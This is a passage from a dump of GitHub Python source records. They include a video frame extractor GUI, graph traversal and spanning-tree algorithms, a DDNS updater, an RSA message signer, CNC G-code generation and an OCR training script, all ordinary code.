logging.error(error_msg)\r\n return\r\n\r\n num_screenshots = int(video_duration) // int(self.interval_entry.text())\r\n logging.info(f\"Extraction started for {num_screenshots} frames.\")\r\n \r\n resolution = self.resolution_dropdown.currentText().split(\" \")[1].replace(\"(\", \"\").replace(\")\", \"\")\r\n self.worker = FrameExtractorWorker(\r\n self.video_path_entry.text(),\r\n self.output_dir_entry.text(),\r\n int(self.interval_entry.text()),\r\n self.frame_name_entry.text(),\r\n self.output_format.currentText(),\r\n resolution,\r\n self.gpu_accel_checkbox.isChecked(),\r\n self.gpu_accel_method.currentText()\r\n )\r\n\r\n # Signals\r\n self.worker.extraction_completed_signal.connect(self.log_extraction_completion)\r\n self.worker.update_progress_signal.connect(self.update_progress)\r\n self.worker.update_status_signal.connect(self.update_status)\r\n self.worker.update_frames_signal.connect(self.update_frames)\r\n self.worker.first_frame_signal.connect(self.update_first_frame_preview)\r\n self.worker.last_frame_signal.connect(self.update_last_frame_preview)\r\n self.worker.start()\r\n \r\n #Drag and Drop\r\n def dragEnterEvent(self, event):\r\n mime_data = event.mimeData()\r\n if mime_data.hasUrls() and len(mime_data.urls()) == 1:\r\n file_path = mime_data.urls()[0].toLocalFile()\r\n if file_path.lower().endswith(('.mp4', '.mkv', '.avi', '.mov')):\r\n event.acceptProposedAction()\r\n\r\n def dropEvent(self, event):\r\n file_path = event.mimeData().urls()[0].toLocalFile()\r\n self.video_path_entry.setText(file_path)\r\n self.video_player.setMedia(QMediaContent(QUrl.fromLocalFile(file_path)))\r\n \r\n # Log Completed Extraction\r\n def log_extraction_completion(self, num_frames, output_dir):\r\n logging.info(f\"Extraction completed. {num_frames} frames extracted to {output_dir}.\")\r\n\r\n #Cancel\r\n def handle_cancel(self):\r\n if hasattr(self, 'worker'):\r\n self.worker.stop()\r\n logging.info(\"Extraction cancelled by the user.\")\r\n\r\n def update_progress(self, value):\r\n self.progress_bar.setValue(value)\r\n\r\n def update_status(self, text):\r\n self.status_label.setText(text)\r\n\r\n def update_frames(self, text):\r\n self.frames_label.setText(text)\r\n \r\n def open_directory(self):\r\n output_dir = self.output_dir_entry.text()\r\n if not output_dir:\r\n QMessageBox.critical(self, \"Error\", \"No directory selected.\")\r\n return\r\n\r\n if os.path.exists(output_dir):\r\n webbrowser.open(output_dir)\r\n else:\r\n QMessageBox.critical(self, \"Error\", f\"Directory {output_dir} does not exist.\")\r\n\r\n \r\n def closeEvent(self, event):\r\n logging.info(\"Application closed.\")\r\n event.accept()\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n app.setStyle(\"Fusion\") # Set the application style to Fusion\r\n ex = FFmpegFrameExtractorApp()\r\n ex.show()\r\n sys.exit(app.exec_())","repo_name":"mdscwo/VideoFrameExtractor","sub_path":"VidFrameFetcher 1.0.py","file_name":"VidFrameFetcher 1.0.py","file_ext":"py","file_size_in_byte":30512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19027426384","text":"from docx import Document\nfrom docx.shared import Inches\nfrom visualization_data import read_xlsx, get_text\n\n\"\"\"\nA function that creates a complete report from the files 'raw_data/sample1.docx' and 'processed_data/processed_data.xlsx'\n\"\"\"\n\n\ndef data_report():\n doc = Document()\n\n # Header\n doc.add_heading('Привіт, це аналітика', level=4)\n\n # Inserting brief information about the sample1.docx file\n docx_file = get_text('../File_System/raw_data/sample1.docx')\n doc.add_paragraph(f'Коротко про цей файл. \\n{docx_file[0]}. {docx_file[1]}')\n\n # Table output\n doc.add_heading('Таблиця всіх присутніх', level=2)\n\n # Getting data from processed_data.xlsx file\n data_excel = read_xlsx()\n\n # Creating a table\n table = doc.add_table(rows=len(data_excel) + 1, cols=3)\n\n # Fill column headers\n table.cell(0, 0).text = 'ID'\n table.cell(0, 1).text = 'Імʼя'\n table.cell(0, 2).text = 'Прізвище'\n\n # Filling the table with data\n for i, item in enumerate(data_excel):\n id = item.get('id')\n first_name = item.get('first_name')\n last_name = item.get('last_name')\n table.cell(i + 1, 0).text = str(id)\n table.cell(i + 1, 1).text = first_name\n table.cell(i + 1, 2).text = last_name\n\n # Deleting content (text) from cells\n table.cell(1, 0).text = ''\n table.cell(1, 1).text = ''\n table.cell(1, 2).text = ''\n\n # Image output\n doc.add_paragraph('\\nЦей графік дасть зрозуміти щось')\n doc.add_picture('media/plot.png', width=Inches(5.0))\n\n # Save\n doc.save('data_analysis_report.docx')\n\n\ndata_report()\n","repo_name":"DenLyakhovsky/Recognize-and-etc","sub_path":"Word/processor_word.py","file_name":"processor_word.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19487760709","text":"class ListNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\ndef insertionSort(head):\r\n if not head:\r\n return head\r\n curr=head.next\r\n sortedhead=head\r\n sortedtail=head\r\n head.next=None\r\n while curr:\r\n sortedcurr=sortedhead\r\n if curr.val<=sortedcurr.val: \r\n node=curr\r\n curr=curr.next\r\n node.next=sortedhead\r\n sortedhead=node\r\n else:\r\n while not sortedcurr.val==sortedtail.val:\r\n if sortedcurr.next.val>curr.val and sortedcurr.val<=curr.val:\r\n node=curr\r\n curr=curr.next\r\n node.next=sortedcurr.next\r\n sortedcurr.next=node\r\n break\r\n else:\r\n sortedcurr=sortedcurr.next\r\n if curr and curr.val>=sortedtail.val:\r\n node=curr\r\n curr=curr.next\r\n sortedtail.next=node\r\n node.next=None\r\n sortedtail=node\r\n return sortedhead\r\n\r\n# l1=ListNode(6)\r\n# l2=ListNode(7)\r\n# l3=ListNode(2)\r\n# l4=ListNode(5)\r\n# l5=ListNode(1)\r\n# l6=ListNode(3)\r\n# l7=ListNode(8)\r\n# l1.next=l2\r\n# l2.next=l3\r\n# l3.next=l4\r\n# l4.next=l5\r\n# l5.next=l6\r\n# l6.next=l7\r\n# sorted=insertionSort(l1)\r\n# print (sorted)\r\n\r\n# l1=ListNode(4)\r\n# l2=ListNode(2)\r\n# l3=ListNode(1)\r\n# l4=ListNode(3)\r\n# l1.next=l2\r\n# l2.next=l3\r\n# l3.next=l4\r\n# sorted=insertionSort(l1)\r\n# print (sorted) \r\n\r\n# l1=ListNode(1)\r\n# l2=ListNode(1)\r\n# l1.next=l2\r\n# sorted=insertionSort(l1)\r\n# print (sorted) \r\n\r\n\r\nl1=ListNode(4)\r\nl2=ListNode(19)\r\nl3=ListNode(14)\r\nl4=ListNode(5)\r\nl5=ListNode(-3)\r\nl6=ListNode(1)\r\nl7=ListNode(8)\r\nl8=ListNode(5)\r\nl9=ListNode(11)\r\nl10=ListNode(15)\r\nl1.next=l2\r\nl2.next=l3\r\nl3.next=l4\r\nl4.next=l5\r\nl5.next=l6\r\nl6.next=l7\r\nl7.next=l8\r\nl8.next=l9\r\nl9.next=l10\r\nsorted=insertionSort(l1)\r\nprint (sorted) ","repo_name":"yifanwangsh/myleet","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10025112735","text":"from delensalot import remapping\nfrom delensalot.core import cachers\nfrom delensalot.core.helper.utils_scarf import Geom, scarfjob\nimport numpy as np\nfrom delensalot.core.helper import utils_scarf as sj\nimport healpy as hp\nfrom delensalot.core.helper.utils_remapping import d2ang, ang2d\n\nfrom plancklens.utils import camb_clfile\n\nPBOUNDS = (0., 2 * np.pi)\nj = sj.scarfjob()\n#j.set_thingauss_geometry(3999, smax=2, zbounds=(0.9, 1))\nj.set_ecp_geometry(100, 100, tbounds=(0.0, np.pi / 10)) # This one is more tricky since has th == 0\n\nlmax = 3000\nclee = camb_clfile('../delensalot/data/cls/FFP10_wdipole_lensedCls.dat')['ee'][:lmax + 1]\nclpp = camb_clfile('../delensalot/data/cls/FFP10_wdipole_lenspotentialCls.dat')['pp'][:lmax + 1]\n\nglm = hp.synalm(clee, new=True)\nplm = hp.synalm(clpp, new=True)\n\ndlm = hp.almxfl(plm, np.sqrt(np.arange(lmax + 1) * np.arange(1, lmax + 2)))\n\nd = remapping.deflection(j.geom, 1.7, PBOUNDS, dlm, 8, 8, cacher=cachers.cacher_mem())\n\ndef fortransolve(defl:remapping.deflection, ir, ip=None):\n \"\"\"Emulates fortran solver on a ring\n\n \"\"\"\n defl._init_d1()\n (tht0, t2grid), (phi0, p2grid), (re_f, im_f) = defl.d1.get_spline_info()\n phis = Geom.phis(defl.geom, ir)[defl._pbds.contains(Geom.phis(defl.geom, ir))]\n tht = defl.geom.get_theta(ir)\n\n if ip is not None:\n assert np.isscalar(ip)\n phis = np.array([phis[ip]])\n print('thetaphi', tht, phis)\n\n thts = defl.geom.get_theta(ir) * np.ones(phis.size)\n #print(fremap.remapping.solve_pixs(re_f, im_f, thts[0:1], phis[0:1], tht0, phi0, t2grid, p2grid)[0])\n TOLAMIN =1e-10\n ft = (thts - tht0) * t2grid\n fp = (phis - phi0) %(2. *np.pi) * p2grid\n redi, imdi = -np.array(defl.d1.eval_ongrid(ft, fp))\n print(redi[0], imdi[0])\n\n maxres = 10.\n itr = 0\n ITRMAX=30\n version = int(np.rint(1 - 2 * tht / np.pi))\n tol = max(TOLAMIN / 180 / 60 * np.pi, 1e-15)\n while (maxres >= tol) & (itr <= ITRMAX) :\n itr = itr + 1\n thti, phii = d2ang(redi, imdi, thts, phis, version)\n ft = (thti - tht0) * t2grid\n fp = (phii - phi0)%(2 * np.pi) * p2grid\n red, imd = defl.d1.eval_ongrid(ft, fp)\n #print(red[0], imd[0])\n \"\"\"#=====\n e_t = 2 * np.sin(thti[3] * 0.5) ** 2\n d2 = red[3] * red[3] + imd[3] * imd[3]\n sind_d = 1. + np.poly1d([0., -1 / 6., 1. / 120., -1. / 5040.][::-1])(d2)\n e_d = 2 * np.sin(np.sqrt(red[3] * red[3] + imd[3] * imd[3]) * 0.5) ** 2\n e_tp = e_t + e_d - e_t * e_d + version * red[3] * sind_d * np.sin(thti[3]) # 1 -+ cost'\n \"\"\"\n #assert (e_tp * (2 - e_tp) > 0.), (e_tp * (2 - e_tp), e_tp, e_t, e_d)\n #=====\n thtn, phin= d2ang(red, imd, thti, phii, version)\n re_res, im_res = ang2d(thtn, thts, phin - phis) # residual deflection field\n res = np.sqrt(re_res * re_res + im_res * im_res)\n maxres = np.max(res)\n redi = redi - re_res\n imdi = imdi - im_res\n print(maxres / np.pi * 180 * 60, 'pixel index ' + str(np.argmax(res)))\n print(itr, ITRMAX, maxres / np.pi * 180 * 60)\n return redi, imdi, thti, phii\n\ndef pixel_solver(defl:remapping.deflection, ir:int, ip:int):\n \"\"\"Solves the inversion 'exactly' (wo splines but brute-force SHT) for a single pixel\n\n \"\"\"\n defl._init_d1()\n sc_job_pixel = scarfjob()\n sc_job_check = scarfjob()\n sc_job_pixel.set_nthreads(1)\n sc_job_pixel.set_triangular_alm_info(defl.lmax_dlm, defl.mmax_dlm)\n\n sc_job_check.set_nthreads(8)\n sc_job_check.set_triangular_alm_info(defl.lmax_dlm, defl.mmax_dlm)\n dclm = [defl.dlm, defl.dlm * 0]\n\n tht = defl.geom.get_theta(ir)\n thts = np.array([tht])\n phi = Geom.phis(defl.geom, ir)[defl._pbds.contains(Geom.phis(defl.geom, ir))][ip]\n sc_job_pixel.set_pixel_geometry(tht, phi)\n sc_job_check.set_ecp_geometry(2, 2, tbounds=(tht, np.pi))\n\n print('thetaphi', tht, phi, Geom.phis(sc_job_pixel.geom, 0))\n phis = np.array([phi])\n TOLAMIN =1e-10\n #ft = (thts - tht0) * t2grid\n #fp = (phis - tht0) %(2. *np.pi) * p2grid\n redi, imdi = -sc_job_pixel.alm2map_spin(dclm, 1)[:,0:1]\n redcheck, imdcheck = -sc_job_check.alm2map_spin(dclm, 1)\n print(redi[0], imdi[0], redcheck[0], imdcheck[0])\n\n maxres = 10.\n itr = 0\n ITRMAX=30\n version = int(np.rint(1 - 2 * tht / np.pi))\n tol = max(TOLAMIN / 180 / 60 * np.pi, 1e-15)\n\n while (maxres >= tol) & (itr <= ITRMAX) :\n itr = itr + 1\n thti, phii = d2ang(redi, imdi, thts, phis, version)\n sc_job_pixel.set_pixel_geometry(thti, phii)\n red, imd = sc_job_pixel.alm2map_spin(dclm, 1)[:,0:1]\n thtn, phin= d2ang(red, imd, thti, phii, version)\n re_res, im_res = ang2d(thtn, thts, phin - phis) # residual deflection field\n maxres = np.max(np.sqrt(re_res * re_res + im_res * im_res))\n redi = redi - re_res\n imdi = imdi - im_res\n print(maxres / np.pi * 180 * 60, sc_job_pixel.geom.theta, Geom.phis(sc_job_pixel.geom, 0))\n print(itr, ITRMAX, maxres / np.pi * 180 * 60)\n return redi, imdi\nif __name__ == '__main__':\n\n d._bwd_angles()\n\n\n","repo_name":"NextGenCMB/delensalot","sub_path":"tests/old/test_inverse.py","file_name":"test_inverse.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34778732060","text":"from copy import deepcopy\n\ndef DFS(tree,vertex=\"A\"):\n \"\"\"\n This method provides a recursive DFS traversal of the tree\n parameter passed in. It maintains a list of each parent and\n child vertice which is returned to each parent via the\n recursive call.\n\n Parameters:\n --------------\n tree : dictionary\n The tree parameter is a dictionary with each key having a\n value of its child vertices associated with it\n vertex : string\n The vertex parameter hold the current parent relative to\n the recursive call. It is \"A\" by default as that is the\n specified starting point per Prof Santana\n\n Returns:\n --------------\n list\n A list of strings representing each vertex in DFS order.\n \"\"\"\n dfs_list = []\n\n #if vertex has not been visited\n if vertex not in dfs_list:\n dfs_list += vertex\n\n #for each child of the vertex\n for child in tree[vertex]:\n dfs_list += DFS(tree,child)\n\n return dfs_list\n\ndef BFS(tree,level=[\"A\"]):\n \"\"\"\n This method provides a BFS traversal of the tree parameter\n passed in. It maintains a list of strings representative of\n each vertex in the tree. For each \"level\" of the tree it makes\n a recursive call passing in each vertex contained within the\n \"sub-level\", (or a list of all of the children of each vertex\n in \"level\").\n\n Parameters:\n --------------\n tree : dictionary\n The tree parameter is a dictionary with each key having a\n value of its child vertices associated with it\n level : list\n The level parameter is a list of strings representative of\n each vertex in a specific \"level\" of the tree\n\n Returns:\n --------------\n list\n A list of strings representative of the each vertex of the\n tree traversed in BFS order\n \"\"\"\n\n bfs_list = []\n\n if len(level) > 0:\n bfs_list += level\n sub_level = []\n for vertex in level:\n sub_level += tree[vertex]\n bfs_list += BFS(tree,sub_level)\n return bfs_list\n\n#from isomorphisms\ndef is_same(list1, list2):\n is_same = True\n\n if len(list1) == len(list2):\n for item in list1:\n if item not in list2:\n is_same = False\n else:\n is_same = False\n return is_same\n\ndef edge_get(graph):\n \"\"\"\n This method returns a list of lists representative of vertex pairs\n (strings) in non-decreasing order. For each key in the dictionary,\n every value is evaluated. If the pair (key,value) already appears\n in edge_list it is ignored, if not it is inserted by comparing it's\n edge weight with the others contained in the list via weights[].\n\n Parameters:\n --------------\n graph : dictionary\n A dictionary with a list of lists that contain a vertex\n (string) and a edge weight (int)\n\n Returns:\n --------------\n list\n A list of strings representative of the each vertex of the\n tree traversed in BFS order\n \"\"\"\n edge_list = []\n weights = []\n\n for node in graph:\n for adj_edge in graph[node]:\n #the current edge\n curr_edge = [node, adj_edge[0]]\n #edge_list empty, ie first iteration\n if len(edge_list) < 1:\n edge_list.append(curr_edge)\n weights.append(adj_edge[1])\n else:\n in_list = False\n #check edge_list for curr_edge's existance\n for i in edge_list:\n if is_same(i,curr_edge):\n in_list = True\n break\n if not in_list:\n #sort edge_list while building\n for i in range(len(edge_list)):\n if weights[i] >= adj_edge[1]:\n edge_list.insert(i,curr_edge)\n weights.insert(i,adj_edge[1])\n break\n if i == len(edge_list)-1:\n edge_list.append(curr_edge)\n weights.append(adj_edge[1])\n return edge_list\n\ndef is_cycle(temp_graph, original, current, prev, visited):\n \"\"\"\n A recursive solution to identifying cycles where a temporary\n graph is passed in, a starting point, the current vertex being\n examined, the previous vertex examined, and a list of vertexes\n on the current path. At each recursive iteration it checks to\n make sure that the current vertex is not being mapped back onto\n the original.\n\n Parameters:\n --------------\n temp_graph : dictionary\n original : string\n current : string\n prev : string\n visited : string\n\n Returns:\n --------------\n list\n \"\"\"\n\n result = False\n\n if len(temp_graph[current]) == 1:\n result = False\n else:\n visited.append(current)\n for x in temp_graph[current]:\n if x == original and x != prev:\n result = True\n else:\n if x not in visited:\n result = is_cycle(temp_graph, original, x, current, visited)\n if result is True:\n break\n return result\n\ndef min_kruskal(graph):\n \"\"\"\n The method works by getting a list of all edges in graph\n in non-decreasing order, creating 2 temporary dictionaries, and\n a list to return. On each iteration an edge gets added to\n temp_graph2, it is then passed to is_cycle to see if there is\n a cycle that exists. If there is a cycle that exists the edge\n is removed, if not it is added to temp_graph. The resulting\n list of edges is returned.\n\n Parameters:\n --------------\n graph : dictionary\n\n\n Returns:\n --------------\n list\n\n \"\"\"\n\n kruskal_mst = []\n temp_graph = {}\n temp_graph2 = {}\n\n #init temp dicts with key values\n for g in graph:\n temp_graph[g] = []\n temp_graph2[g] = []\n #get edges in graph\n kruskal_g = edge_get(graph)\n\n for edge in kruskal_g:\n temp_graph2[edge[0]] += edge[1]\n temp_graph2[edge[1]] += edge[0]\n if is_cycle(temp_graph2,edge[0],edge[0],edge[0],[]) == False:\n temp_graph = deepcopy(temp_graph2)\n kruskal_mst.append(edge)\n else:\n temp_graph2 = deepcopy(temp_graph)\n return kruskal_mst\n\n\ndef min_prim(graph):\n \"\"\"\n Due to the length of this method, please refer to inline\n comments.\n\n Parameters:\n --------------\n graph : dictionary\n\n Returns:\n --------------\n list\n\n \"\"\"\n\n prims_g= edge_get(graph)\n mst = []\n temp_graph = {}\n temp_graph2 = {}\n # initialize temps to hold empty lists []\n for g in graph:\n temp_graph[g] = []\n temp_graph2[g] = []\n # add the first edge to the mst and temp graphs\n mst.append(prims_g[0])\n temp_graph2[prims_g[0][0]] += prims_g[0][1]\n temp_graph2[prims_g[0][1]] += prims_g[0][0]\n temp_graph = deepcopy(temp_graph2)\n # remove first edge from edgelist\n prims_g.pop(0)\n # delete edges in prims_g if added to mst until either there is nothing left or\n # the only edges we can add create cycles\n while(len(mst) < len(graph.keys())-1):\n check = False\n # loop through the edges to find the next one to add\n for edge in prims_g:\n # loop through mst to see if the current edge to add contains a vertex currently in the mst\n for x in mst:\n # if there is an edge that has a vertex part of the current mst add it to the temp and make sure it doesnt create a cycle\n if edge[0] in x or edge[1] in x:\n temp_graph2[edge[0]] += edge[1]\n temp_graph2[edge[1]] += edge[0]\n # if no cycle is made, commit it to the other temp and add that edge to mst and remove it from the edgelist\n if is_cycle(temp_graph2, edge[0], edge[0], edge[0], []) == False:\n temp_graph = deepcopy(temp_graph2)\n mst.append(edge)\n prims_g.remove(edge)\n check = True\n break\n # if it does make a cycle, undo that edge\n else:\n check = False\n temp_graph2 = deepcopy(temp_graph)\n if check == True:\n break\n return mst\n","repo_name":"warnickb/MTH325","sub_path":"Project/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":8712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43105511386","text":"from django.conf import settings\n\n\ndef show_debug_toolbar(request):\n \"\"\"Shows the debug toolbar based on the debug arg in the URL.\n\n ?debug=on - turns debugging on in the current session\n ?debug=off - turns debugging off in the current session\n\n Based on http://djangosnippets.org/snippets/2574/, but allowing staff to\n use it in production.\n \"\"\"\n if settings.DEBUG or request.user.is_staff:\n debug = request.GET.get(\"debug\", None)\n if debug == \"on\":\n request.session[\"debug\"] = True\n elif debug == \"off\" and \"debug\" in request.session:\n del request.session[\"debug\"]\n return \"debug\" in request.session\n return False\n","repo_name":"outreachy/website","sub_path":"outreachyhome/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"72"} +{"seq_id":"6604481746","text":"# coding=utf-8\n# @FileName: test-mutiprcs.py\n# @Author: ZhengQiang\n# Date: 2020/2/18 1:55 下午\nimport time\nimport multiprocessing\n\n\ndef f1(i):\n print('muti_a')\n time.sleep(i)\n\n\ndef f2(i):\n print('muti_b')\n time.sleep(i)\n\n\nif __name__ == '__main__':\n a = multiprocessing.Process(target=f1, args=(10,), name='asd')\n b = multiprocessing.Process(target=f2, args=(15,), name='ppp')\n a.start()\n b.start()\n s = multiprocessing.Semaphore(2)\n print(s)\n print(\"The number of CPU is:\" + str(multiprocessing.cpu_count()))\n for p in multiprocessing.active_children():\n print(\"child p.name:\" + p.name + \"\\tp.id\" + str(p.pid))\n\n","repo_name":"zq0324/zq","sub_path":"com/test-mutiprcs.py","file_name":"test-mutiprcs.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33244947858","text":"\"\"\"\n Simple script to update a DDNS record\n\n\"\"\"\nimport asyncio\nimport sys\n\nfrom dnsaio import protocol as dns_protocol\n\nimport dns.update\nimport dns.query\nimport dns.tsigkeyring\n\n\n@asyncio.coroutine\ndef query(transport, protocol):\n keyring = dns.tsigkeyring.from_text({\n 'key' : 'secret=='\n })\n\n zone = 'zone.example.com'\n host = sys.argv[1]\n address = sys.argv[2]\n update = dns.update.Update(zone, keyring=keyring)\n update.replace(host, 300, 'AAAA', address)\n\n return (yield from protocol.query(update))\n\ndef main():\n loop = asyncio.get_event_loop()\n\n transport, protocol = loop.run_until_complete(\n loop.create_connection(\n dns_protocol.DnsProtocol,\n host='localhost',\n port=53,\n )\n )\n\n data = loop.run_until_complete(query(transport, protocol))\n\nif __name__ == '__main__':\n main()\n","repo_name":"kingxsp/dnsaio","sub_path":"examples/dynamic_dns.py","file_name":"dynamic_dns.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23389223727","text":"from __future__ import print_function\nimport os\nfrom py2gcode import gcode_cmd\nfrom py2gcode import cnc_drill\nfrom params import params\n\nsafeZ = 0.15\nstepZ = 0.02\nstartZ = 0.0\nstopZ = -(params['plate']['thickness'] + 0.12) \nfeedrate = 2.5\nstartDwell = 2.0\n\nprog = gcode_cmd.GCodeProg()\nprog.add(gcode_cmd.GenericStart())\nprog.add(gcode_cmd.Space())\nprog.add(gcode_cmd.FeedRate(feedrate))\n\n# Part mount holes 10-32 tap holes\npartHoleDict = params['partMountHoles']\nfor partXPos in params['plate']['xPosArray']:\n for i in (-1,1):\n xPos = partXPos + i*0.5*partHoleDict['holeSpacing']\n yPos = partHoleDict['yMidPos'] + i*0.5*partHoleDict['holeSpacing'] \n drillDict = { \n 'centerX' : xPos,\n 'centerY' : yPos,\n 'startZ' : startZ,\n 'stopZ' : stopZ,\n 'safeZ' : safeZ,\n 'stepZ' : stepZ,\n 'startDwell' : startDwell,\n }\n drill = cnc_drill.PeckDrill(drillDict)\n prog.add(drill)\n prog.add(gcode_cmd.Space())\n\nprog.add(gcode_cmd.Space())\nprog.add(gcode_cmd.End(),comment=True)\nprint(prog)\nbaseName, dummy = os.path.splitext(__file__)\nfileName = '{0}.ngc'.format(baseName)\nprint(fileName)\nprog.write(fileName)\n","repo_name":"iorodeo/stir_plate_mechanics","sub_path":"cnc/motor_hub/drill_fixture/plate/drill_10_32_tap.py","file_name":"drill_10_32_tap.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70840496553","text":"import os\nimport sys\nfrom sacred import Experiment\n\nex_images = Experiment()\n\n\n@ex_images.config\ndef default_config():\n batch_size = 32\n epochs = 80\n memory_units = 512\n pool_size = 2\n\n charset = 67 # a-zA-Z0-9,.- /\n line_width_padded = 535\n line_height_normalized = 64\n max_string_length = 7\n\n force_new = True\n\n training_samples = None\n\n\n@ex_images.main\ndef run(training_samples, batch_size, epochs, memory_units, pool_size, charset, line_width_padded, line_height_normalized,\n max_string_length, force_new):\n from src.handwritten_text_recognition.ocr.train.classifier_controller import Classifier\n from src.handwritten_text_recognition.ocr.train.data_generator import DataGenerator\n from src.handwritten_text_recognition.ocr.train.visualization_callback import VisualizationCallback\n from src.handwritten_text_recognition.config import get_path_to_model_dir_in_assets\n\n classifier = Classifier()\n\n image_paths = None\n image_labels = None\n\n if training_samples is None:\n image_paths, image_labels = classifier.load_dataset(Classifier.DATASET_TYP['cvl'])\n else:\n image_paths, image_labels = classifier.load_dataset(training_samples)\n\n generator = DataGenerator(downsample_factor=(pool_size ** 2),\n line_width_padded=line_width_padded,\n line_height_normalized=line_height_normalized, max_string_length=max_string_length)\n generator.setup_training(image_paths=image_paths, image_labels=image_labels, batch_size=batch_size)\n\n model = classifier.define_model(charset=charset,\n line_height_normalized=line_height_normalized,\n memory_units=memory_units, pool_size=pool_size,\n line_width_padded=line_width_padded, max_string_length=max_string_length)\n\n if force_new is False:\n rnn_model = model.get_model()\n rnn_model.load_weights(get_path_to_model_dir_in_assets('cvl-80epochs.h5'))\n\n test_function = model.get_test_function()\n visualization_callback = VisualizationCallback(test_function, generator.generate_validation())\n\n classifier.train(generator, epochs, callbacks=[generator, visualization_callback], visualize=True)\n\n\nif __name__ == '__main__':\n head, tail = os.path.split(os.path.join(os.path.abspath(__file__)))\n PACKAGE_DIR = os.path.join(head, '..{}..{}'.format(os.sep, os.sep))\n\n sys.path.insert(0, PACKAGE_DIR)\n\n ex_images.run_commandline()\n","repo_name":"CrazyCrud/ocr-with-keras","sub_path":"src/handwritten_text_recognition/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22800842804","text":"import queue\n\nclass sorting:\n def __init__(self, x1, x2):\n self.x1 = x1\n self.x2 = x2\n def __lt__(self, other):\n return self.x1 < other.x1\n\nn = int(input())\npoints = []\nfor _ in range(n):\n x, y = map(float, input().split())\n points.append((x,y))\n\n \ncount_array = [0] * n\n\npq = queue.PriorityQueue()\nfor sort_queue in points:\n pq.put(sorting(sort_queue[0], sort_queue[1]))\n\nresults = []\nwhile not pq.empty():\n imp = pq.get()\n results.append(imp.x2)\n \ncount = 0\nfor i in range(len(results)):\n for j in range(i+1):\n if results[i] > results[j]:\n if results[i] > results[j]:\n count += 1\n count_array[i] = count\n count = 0\n\n\nfor _ in range(len(count_array)):\n print(count_array[_])\n \n \n \n \n \n \n","repo_name":"LiamChiang/Algorithms-and-Complexity","sub_path":"Assignment/Assignment2/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3303555851","text":"import argparse\nimport select\nimport socket\nimport sys\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nimport binascii\n\n\ndef client_init(hostname, msg):\n\n\tpadded_len = '0' * (4-len(str(len(msg)))) + str(len(msg))\n\n\tkey = RSA.import_key(open('myRSAkey.pem').read())\n\n\th = SHA256.new(str.encode(msg))\n\tsignature_hex = binascii.hexlify(pkcs1_15.new(key).sign(h))\n\n\tsignature_len = '0' * (4-len(str(len(signature_hex)))) + str(len(signature_hex))\n\n\tsigned_message = padded_len + msg + signature_len + signature_hex.decode('utf8')\n\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n\t\ts.connect((hostname, 9998))\n\n\t\ts.send(signed_message.encode('utf8'))\n\n\t\treturn\n\n\ndef genkey():\n\tkey = RSA.generate(4096)\n\tf_pub = open(\"mypubkey.pem\", \"wb\")\n\tf_pub.write(key.publickey().export_key())\n\tf_pub.close()\n\n\tf_private = open(\"myRSAkey.pem\", \"wb\")\n\tf_private.write(key.export_key('PEM'))\n\tf_private.close()\n\n\treturn\n\t\n\n\nif (len(sys.argv) < 2):\n\tprint('Usage: signer.py --genkey | --c hostname --m message')\n\nelif (sys.argv[1] == '--genkey'): \n\tif (len(sys.argv) != 2): print('Usage: signer.py --genkey | --c hostname --m message')\n\telse: \n\t\tgenkey()\n\nelif (sys.argv[1] == '--c'):\n\tif (len(sys.argv) <= 2): print('Usage: signer.py --genkey | --c hostname --m message')\n\telse: \n\t\tclient_init(sys.argv[2], sys.argv[4])\n\nelse: print('Usage: signer.py --genkey | --c hostname --m message')","repo_name":"sleptcodes/Network-Security-Applications","sub_path":"signer.py","file_name":"signer.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18749573598","text":"import os\nimport platform as pf\nimport shutil\nimport subprocess\nimport tarfile\nfrom datetime import datetime\nfrom pathlib import Path\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nimport libtmux\nimport vdf\nimport yaml\n\nfrom .config import Config\n\n\nclass App():\n def __init__(self, app, app_dir, backup_dir=None, platform=None):\n self.app_id, self.app_name, self.server_name = Index.search(app)\n\n # app_id is required, if None raise FileNotFoundError\n f = f'{self.app_id}.yaml'\n self.config_f = Path(Config.data_dir, 'apps', f)\n self.config_is_default = True\n\n # check for user app config file\n d = Path(Config.config_dir, 'apps')\n if d.exists() and Path(d, f).is_file():\n self.config_f = Path(d, f)\n self.config_is_default = False\n\n with open(self.config_f, 'r') as f:\n data = yaml.safe_load(f)\n\n self.app_names = list(data['apps'].keys())\n if not self.app_name:\n self.app_name = self.app_names[0]\n\n self.server_names = 